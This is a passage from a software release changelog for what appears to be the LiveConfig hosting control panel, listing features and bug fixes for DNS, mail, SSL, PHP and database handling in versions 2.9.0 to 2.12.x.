*   disabling of SSH accounts did not work when using private key authentication
*   fixed warning regarding missing systemd-reload after update
*   fixed bug in Let’s Encrypt module when finalization has failed and is in “processing” state
*   DNS updates got stuck in a loop when multiple large IP groups where updated within a short interval

**Changes in version 2.12.2 (08/25/2021):**

*   allow disabling default MX records when setting custom MX records
*   improved detection of CentOS Stream 8
*   updated OpenSSL to 1.1.1l
*   differing MX was not used when adding a new domain

**Changes in version 2.12.1 (08/11/2021):**

*   improved displaying MX records and SMTP server name
*   autoresponder status wasn’t displayed in mailbox list

**Changes in version 2.12.0 (07/29/2021):**

*   allow configuration of PHP FPM pool settings (e.g. `pm.max_children`) via php.ini management
*   allow configuration of differing MX records for Postfix
*   edit mailbox: added “info” tab with all mailbox settings at a glance
*   support for Debian 11 (“Bullseye”)
*   support for CentOS Stream 8
*   log SASL user name in lcpolicyd when rejecting e-mails
*   improved security of password protection when using NGINX as reverse proxy for Apache
*   also removing `/var/tmp` from `open_basedir` in php.ini when running PHP via FPM
*   show subscription comment also to end-users (in webspace overview) to better differentiate between multiple subscriptions
*   prepared new licensing features
*   improved compatibility of Autodiscover feature with Microsoft Outlook Connectivity Test
*   support deletion of dynamic DNS records (A or AAAA)
*   connection to MySQL now also possible via IP (instead of only UNIX socket)
*   fixed timing problem when updating Postfix map files (could lead to deadlock under certain conditions)
*   Postfix `sender_bcc`/`recipient_bcc` also contained addresses without destination address
*   updating the validity period of SSL intermediate certificates if this is missing
*   fixed bug when allowing external database access for existing databases

**Changes in version 2.11.3 (04/06/2021):**

*   allow configuration of a default SPF record (if no custom SPF record is defined for a domain)
*   changed default location of most .pid files from `/var/run/` to `/run/` on Debian/Ubuntu
*   supporting installation with mod\_php and without php-cgi
*   allow disabling creation of catch-all e-mail addresses (existing catch-all addresses can still be managed)
*   updated OpenSSL to 1.1.1k
*   allowing UTF symbols (e.g. emojis) in domain names
*   disabling sql\_mode _ONLY\_FULL\_GROUP\_BY_ when using MySQL/MariaDB as backend database for LiveConfig
*   when adding/deleting directly managed secondary DNS servers from DNS templates, the `zones.liveconfig` file sometimes not was updated
*   DNSSEC keys where removed under certain conditions when DNS templates where modified
*   fixed expiry date of intermediate SSL certificates (some certificate chains where shown as being expired)

**Changes in version 2.11.2 (02/22/2021):**

*   fixed bug in PHP version list (list was empty in some cases)

**Changes in version 2.11.1 (02/22/2021):**

*   updated OpenSSL, Unbound and cURL libraries
*   restricted PHP versions are marked in overview list
*   disabled reverse DNS lookups in ProFTPD (configuration needs to be refreshed)
*   checking BCC destinations against forward domains blacklist
*   number of subdomains using the default PHP version was not counted correctly
*   fixed several missing translations

**Changes in version 2.11.0 (02/16/2021):**

*   usage of outdated PHP versions can now be restricted
*   a copy of all incoming and outbound e-mails can now be sent via BCC to another address (e.g. for e-mail archiving)
*   added SOAP method `CustomerDelete()`
*   a comment can now be added to subscriptions (to better differentiate between several subscriptions)
*   ignore errors when LogRotate `postrotate` command fails
*   improved error handling when PHP-FPM is not installed and a subscription was configured with PHP-FPM
*   rejecting e-mails to local accounts, except those listed in `/etc/aliases`
*   show message when OpenDKIM wasn’t found
*   increased maximum password length for `HostingMailboxAdd/Edit()` to 200 chars
*   private log files are now also rotated even if the user has exceeded his filesystem quota
*   suPHP option is not available any more for new hosting plans & subscriptions (suPHP is deprecated and will not be supported in the future)
*   option “skip DNS check” was ignored when adding a new SSL certificate (worked only when editing existing SSL jobs)
*   fixed bug in detection of PHP 7.4 FPM on Ubuntu 20
*   number of subdomains using the default PHP version was not counted correctly
*   fixed bug in `UsageStats` (`HostingSubscriptionGet()`) - data was returned in bytes/kB instead of MB

**Changes in version 2.10.4 (11/13/2020):**

*   replaced `%h` with `%a` in Apache LogFormat
*   userprefs path for SpamAssassin now is always created when spam filter is enabled for a mailbox (allows using the Bayes filter)
*   fixed JavaScript escaping (affected some popup windows on French interface)
*   don’t use system skeleton directory when creating users on CentOS/RHEL

**Changes in version 2.10.3 (11/05/2020):**

*   fixed bug when changing database password on MariaDB 10.1.x
*   also display installed but unused PHP versions at Server Management -> Web
*   fixed bug in login informations popup (when no language was configured for the receiving user)

**Changes in version 2.10.2 (10/30/2020):**

*   support enabling DNSSEC when adding domain via SOAP API
*   show end-of-life (EOL) date and comments in PHP version select dropdown
*   edit comments and EOL dates of PHP versions (Server Management -> Web)
*   domains/subdomains added via SOAP API are now displayed in “default view” by default
*   when a subscription is deleted, all assigned SSL certificates are now automatically deleted too
*   e-mail with login informations is now prepared in language of recipient
*   user language can be selected when adding a customer or editing a user
*   Webspace overview doesn’t show the host ID any more, but the server name (hostname)
*   server description is now displayed in server selection dropdown (when creating a new subscription)
*   permissions of directories created with `LC.fs.mkdir_rec` were too restrictive
*   support MySQL “authentication\_string” authorization with upgraded databases
*   displayed wrong size of DNSSEC keys (factor 8)
*   fixed HTML escaping of translated phrases
*   when disabling a user, active sessions are immediately closed

**Changes in version 2.10.1 (09/17/2020):**

*   some configuration files where created with wrong permissions (error in v2.10.0)

**Changes in version 2.10.0 (09/16/2020):**

*   allow wildcard domains (e.g. `*.example.org` or even `*.tld`) for e-mail blacklists/whitelists
*   SOAP method `HostingMailboxGet()` added (returns configuration of an e-mail address)
*   use `/var/www/.skel` (if existing) as so-called “skeleton directory” when adding new webspace accounts
*   support global configuration overrides for PHP FPM pools (Lua table `LC.web.FPMCONFIG`)
*   checking expire date of intermediate (chain) SSL/TLS certificates
*   full support for CentOS 8
*   full support for Ubuntu 20.04 LTS
*   IFRAME-API: added `toTop()` javascript function to scroll to top of page from within IFRAME content
*   supporting openSUSE 15.1
*   SOAP method HostingSubscriptionGet() now also returns a list of all configured e-mail addresses
*   prepared for repository GPG key rollover (key id: D409AC6D65FE6664)
*   supporting domain-specific Apache configuration includes also with proxy destinations
*   updated OpenSSL to v1.1.1g
*   supporting new privilege system on MariaDB 10.4
*   changed default mailbox home directory from `/var/mail` to `/var/mail/%C/%I` (fixes problem with repeated mails from autoresponder)
*   improved MySQL authentication to work with MySQL 8.x
*   support _auth\_socket_ authentication (without password) for MySQL root user
*   iOS mobileconfig supports multiple mailboxes within same domain on same device
*   iOS mobileconfig supports disabling IMAPS/POP3S (port 993/995)
*   added _autocomplete_ attributes to password fields for better usability
*   minor CSS improvements
*   improved NGINX vHost configuration for web statistics
*   improved NGINX reverse proxy configuration
*   SOAP method HostingSubscriptionGet() now also returns configured PHP version per subdomain as well as usage data of the subscription (UsageStats)
*   increased limit for php.ini settings (text) from 512 to 4096 byte
*   changed default setting for php.ini setting `opcache.file_cache` from `%HOME%/tmp` to "” (empty string), effectively disabling file cache by default
*   added `%PHP%` placeholder in php.ini settings (allows option `opcache.file_cache` to be set per PHP version, e.g. `%HOME%/.cache/opcache.%PHP%`)
*   fixed wrong password limit when enabling/modifying OTP configuration
*   fixed minor bug when searching for full mail address in list of mailboxes
*   domain was not removed from Postfix’ `recipient_access` file when locked subscription was deleted
*   fixed bug when creating additional ftp accounts using `HostingFtpAdd()` (affected version 2.9.x)
*   fixed bug resetting shell to `nologin` when reseller has edited an existing hosting plan
*   fixed problem in ACMEv2 client when using e.g. Buypass CA
*   .htpasswd file for web statistics was not generated when using only NGINX
*   disabling TLS1/TLS1.1 was ignored with NGINX
*   SSL cipher selection (default/strong) wasn’t applied to NGINX vHosts
*   fixed bug when changing password on MySQL 8.x

**Changes in version 2.9.3 (03/03/2020):**

*   fixed problem regarding Let’s Encrypt update when MySQL was being used as backend database

**Changes in version 2.9.2 (03/03/2020):**

*   allow downloading list of SSL certificates as CSV file
*   added option to disable TLSv1/TLSv1.1 per IP group for web server
*   added SOAP methods `HostingDCVCreate()`/`HostingDCVDelete()`
*   improved systemd configuration of liveconfig/lcclient
*   ACMEv2: some fixes to work with Let’s Encrypt Staging API
*   automated renewal of SSL certificates from Let’s Encrypt affected by their “CAA rechecking bug”
*   lcphp: `PHP_BINARY` environment variable got lost
*   SAN domains were ignored in SSL orders (v2.9.x)

**Changes in version 2.9.1 (12/13/2019):**

*   SSL certificates: added filter option “only own certificates”
*   salutation (contact data) can now be left empty
*   table search string wasn’t saved during page refresh
*   fixed display of version number in “Servers” report
*   fixed bug (missing permissions) when adding a FTP user as an additional LiveConfig user
*   fixed missing permission check when editing domains at “my hosting” as additional LiveConfig user
*   comparing `HC_REFRESHCFG` with version number (revision number not available any more)
*   fixed bug in quota check when editing mailboxes

**Changes in version 2.9.0 (11/29/2019):**

*   Let’s Encrypt: retry domain validation after HTTP errors (eg. timeout with Let’s Encrypt API) every 15 minutes
*   the DNS checks for automated SSL/TLS certificates can now be individually skipped (e.g. when using a CDN)
*   when private IPv4 addresses are used (without corresponding IP\_NAT data) then the DNS checks for Let’s Encrypt are automatically skipped
*   it’s now possible to change the PHP CLI used by the Application Installer (using Lua variable `LC.web.PHPCLI`)
*   automatic configuation of automated SSL certificates can now optionally be disabled (using checkboxes in order form)
*   allow binding Postfix only to localhost (127.0.0.1)
*   when an additional admin user adds a new server, he now automatically gets all permissions for that server
*   when a domain is deleted, optionally all assigned SSL certificates can be deleted too
*   improved detection of matching wildcard SSL certificates when configuring subdomains
*   list of SSL certificates can now be filtered (expired, unassigned, …)
*   mass mails aren’t sent to suspended customers any more (can be enabled via checkbox)
*   overview of SSL jobs (start page) doesn’t show entries of suspended customers any more
*   allow editing e-mail addresses of Let’s Encrypt accounts
*   display HTTPS links in AppInstaller if domain is configured with SSL
*   AppInstaller: uninstall sometimes failed when directory of application didn’t yet exist or was already deleted before uninstall
*   deleting a domain with existing mailboxes as reseller sometimes returned an error (missing permissions)
*   end users with hosting plans created via GUI didn’t have the permission to view the LiveConfig event log
*   fixed display error when editing a subdomain while parent domain has “(+www)” configuration enabled, preferring the “.www” subdomain
*   fixed bug when merging www/non-www subdomains if they were configured as redirect
*   don’t allow to automatically order SSL certificate when adding a new domain if user has no SSL management permissions
*   fixed bug when adding an automated SSL certificate with automatic HTTPS redirect (non-webspace targets where configured incorrectly)
*   fixed bug when configuring FPM with default PHP on CentOS (wrong directory for pool configuration)
*   lcsam: removed duplicate line breaks in X-Spam-Report

**Archive**

*   Changelog for version 2.0-2.8
*   Changelog for version 1.x

Tag

#microsoft